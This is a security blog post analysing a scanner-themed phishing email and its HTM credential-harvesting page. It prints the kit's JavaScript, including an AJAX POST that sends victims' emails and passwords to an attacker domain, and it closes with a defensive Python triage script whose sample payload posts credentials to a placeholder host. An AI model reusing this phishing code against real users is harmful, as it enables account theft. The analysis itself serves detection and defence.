When Your Office Scanner Is Framed for Phishing

Malicious actors have been leveraging the 'scan to email' functionality of document-handling office equipment like scanners and copiers for the better part of a decade as bait to convince targeted users to install malware on their machines. Recently, however, we have noticed staff receiving emails that use similar bait but whose aim is not malware installation but account credential phishing (targeting Microsoft Live accounts), illustrating that this particular attack vector has evolved from delivering malware payloads to compromising account credentials.

The Email Bait

Recently, staff received an email letting them know that they had a scanned document ready, with the scan purportedly done on the 'Theintercept DocuCentre-SCANFX-2EFF73' scanner, located at the 'Frontdesk'. The email includes an HTM file as an attachment and claims to have come from 'Theintercept Sharepoint Scanner'.

Screenshot of the phishing email bait

The sender name, 'Theintercept Sharepoint Scanner' attempts to leverage the capability of various scanners to send documents to a Microsoft SharePoint library. Xerox, the brand being spoofed in the phishing email, has precisely such a feature. A small red flag at this stage is that SharePoint has been misstylized as 'Sharepoint' and that the message contains irregular capitalization ("A New File was Scanned to you").

Taking a closer look at the From field reveals that the email came not from an internal company address but from no-reply-exchangelab-apcprd01.documentation.protection.ocbc35853@phumaianh-vn[.]com. The long, 64-character username seems designed to obscure the fact that the domain name does not match the company domain the email claims to come from (in our case, the email is claiming to come from The Intercept).

The From field of the phishing email

The Phishing Payload

Viewing the page source of the payload HTM file reveals that the phishing page deploys rudimentary obfuscation by using percent-encoding for multiple characters in the source code.

Excerpt of obfuscated phishing page source code

Unescaping the code reveals the human-readable page source, as no further obfuscation techniques were used by the phisher.

Excerpt of deobfuscated phishing page source code

If the user opens the HTM file, they are presented with a login prompt atop a blurred document background.

Phishing landing page

The blurred document background appears designed to be a blurred representation of Adobe Acrobat, with the login overlay placed to make the user think the document will appear after they login.

A document open in Adobe Acrobat, the appearance of which the phishing campaign mimics

The blurred background image is loaded via the following code:

<div class="row" style="background-image: url('https://app.forexliteoptions.com/core/database/xero/images/8.jpg'); background-size: cover;background-repeat: no-repeat;">

The presence of other suspect files in the unprotected ../xero/ directory indicates that the forexliteoptions[.]com domain may have been compromised by the attacker to facilitate their phishing campaigns.

There are a number of further notable minor flourishes on the phishing login page. The first is that the email address is prefilled for the user. For the phisher this has two added benefits: every instance of the malicious HTM file is unique, and the prefilled address drives the further automatic customization of the phishing page described below.

Phishing page login prompt

The top of the login prompt is adorned with the target organization's logo, while the title of the login prompt includes the organization's name (though with incorrect spacing). These customization effects are achieved via the following code:

  // Read the prefilled victim address from the form
  var email=$("#email").val();
  console.log(email);
  // Take everything after the last '@' as the organization's domain
  var domain = email.substring(email.lastIndexOf("@") +1);
  // Strip the TLD to get a display name for the title
  var frmsite = domain.substring(0, domain.lastIndexOf("."));
  // Fetch the organization's favicon via a third-party lookup service
  document.getElementById("fieldImg").src = `https://api.statvoo.com/favicon/?url=${domain}`;
  // Build the login prompt title from the (capitalized) domain name
  document.getElementById("head-message").innerHTML = `${ucFirst(frmsite)} Secured Document`;

The phishing page parses the domain out of the prefilled email, then uses the domain both to populate the '... Secured Document' title field and to fetch the domain's favicon and insert it at the top of the login prompt. The phishing page uses Statvoo's API (which in turn makes a call to https://www.google.com/s2/favicons?sz=64&domain_url=) to fetch the favicon. Ironically, Statvoo, which provides website reviews and statistics, is designed to "Avoid online scams and unsafe websites".

If the user enters their password and presses the Login button, the button changes to say that it is 'Verifing' (succumbing to the common phishing red flag of basic misspelling).

Misspelled phishing page button

The phishing page then passes on the user credentials to a third-party site:

       {
         $.ajax({
          dataType: 'JSON',
          url: 'https://server.bossthraed.com/kelval.php',
          type: 'POST',
          data:{
            email:email,
            password:password,
            detail:detail,

          }

The PHP script located on bossthraed[.]com then returns a signal value in its response. If the signal is no-auth, meaning that the credentials are invalid, the phishing page displays a message that the credentials are incorrect (the exact message wording is relayed from the PHP script, not hardcoded into the phishing page), prompting the user to enter them again. This represents a relative sophistication of the phishing campaign: the attacker's script tests the legitimacy of the user credentials in real time, and so harvests only working credentials.

Invalid credentials phishing page response message

If, however, the phishing page receives the success signal, meaning that the attacker's script has determined that the entered credentials are valid, the phishing page then appears to redirect to a PDF file hosted on Microsoft OneDrive.

               if(response['signal'] == 'success'){
                 $('#msg').html(response['msg']);
                 $("#msg").show();
                 $('#msg').addClass( 'alert-success' );
                 $(".modal-header").addClass('hide');
                 setTimeout('window.location.href=\x27https://onedrive.live.com/redir?resid227BFC55B5&ithint&authkey=!AEPvKF_OtOAaCH0==file,pdfE87969!134&e=GXnFAo\x27;', 0x5dc);
                 
                }

The OneDrive link is no longer valid, now returning a "This item might not exist or is no longer available" response, and so we are unable to go any further in the campaign and see what the document actually was — if the document link was ever working in the first place.
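The analysis above walks through the traits that give this attachment away: percent-encoded source, a prefilled victim address, a favicon lookup through a third-party API, and a jQuery POST of the password to a domain outside the organization. The following triage script, added here as an example and not part of the original analysis, decodes an HTM attachment and reports those traits. The sample attachment, the collector hostname collector.placeholder.invalid and the organization domain example.org are constructed for the example.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample in the shape described above (not the real attachment):
# percent-encoded HTML with a prefilled address, a favicon lookup and an
# $.ajax POST of the entered credentials to a placeholder collector domain.
SAMPLE_HTM = (
    "%3Cinput%20id%3D%22email%22%20value%3D%22jane.doe%40example.org%22%3E"
    "%3Cscript%3Evar%20domain%3D%22example.org%22%3B"
    "document.getElementById%28%22fieldImg%22%29.src%3D%60https%3A%2F%2F"
    "api.statvoo.com%2Ffavicon%2F%3Furl%3D%24%7Bdomain%7D%60%3B"
    "%24.ajax%28%7BdataType%3A%20%27JSON%27%2C%20url%3A%20%27https%3A%2F%2F"
    "collector.placeholder.invalid%2Fkelval.php%27%2C%20type%3A%20%27POST%27%2C"
    "%20data%3A%7Bemail%3Aemail%2Cpassword%3Apassword%7D%7D%29%3B%3C%2Fscript%3E"
)
ORG_DOMAIN = "example.org"  # assumed: the defender's own mail domain

def deobfuscate(html):
    """Percent-decode until the text stops changing (also handles double encoding)."""
    prev = None
    while prev != html:
        prev, html = html, unquote(html)
    return html

def triage(html, org_domain=ORG_DOMAIN):
    """Return (decoded source, findings) for a suspected credential-phishing HTM."""
    src = deobfuscate(html)
    findings = []
    # Prefilled victim address: makes each file unique and feeds the page's customization.
    m = re.search(r'id="email"[^>]*value="([^"]+@[^"]+)"', src)
    if m:
        findings.append(("prefilled_email", m.group(1)))
    # jQuery POST carrying a password field to a host outside the organization.
    for m in re.finditer(r"url:\s*'([^']+)'.*?type:\s*'POST'.*?password", src, re.S):
        host = urlparse(m.group(1)).hostname or ""
        if host != org_domain and not host.endswith("." + org_domain):
            findings.append(("external_credential_post", host))
    # Favicon fetched through a third-party lookup service to brand the prompt.
    if re.search(r"""https?://[^\s'"`]+/favicon/\?url=""", src):
        findings.append(("dynamic_favicon_lookup", "favicon/?url="))
    # Every host the page references, as candidate indicators for blocking.
    urls = re.findall(r"""https?://[^\s'"`)]+""", src)
    findings.append(("referenced_hosts", sorted({urlparse(u).hostname for u in urls})))
    return src, findings

if __name__ == "__main__":
    decoded, found = triage(SAMPLE_HTM)
    for kind, value in found:
        print(kind, value)
```

The regexes are tuned to the jQuery-style exfiltration seen in this campaign; a kit that uses a plain form action or fetch() would need an additional pattern.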

Summary of Findings

  • The phishing campaign attempts to leverage the 'scan to email' functionality of modern office document-handling equipment as the bait text to lure users into opening an attachment which contains a credential-harvesting phishing page.
  • The phishing page employs basic customization via inserting the target domain into the title of the login page as well as using the target domain's favicon.
  • A script hosted on another domain checks the validity of the entered credentials in real time, and redirects the user to a document only upon entry of valid credentials, otherwise displaying an 'incorrect password' error.

Indicators of Compromise (IOCs)

Documents

Filename: theintercept-Scanned.htm

SHA256 Checksum: d19c858559435cc2d4ef11c00afe06ccf5d54a73b8c6fd6c6be5aa72f88a16ff

Note: As the phishing HTM file comes prefilled with the target's email, each document will be unique.

Domains

  • bossthraed[.]com The domain which receives the harvested user login credentials.
  • forexliteoptions[.]com The domain used to store images and other files for the phishing campaign.
  • onedrive.live[.]com/redir?resid227BFC55B5&ithint&authkey=!AEPvKF_OtOAaCH0==file,pdfE87969!134&e=GXnFAo The file that the user is finally redirected to upon entering valid credentials on the phishing site.
  • phumaianh-vn[.]com The domain used to send the bait email.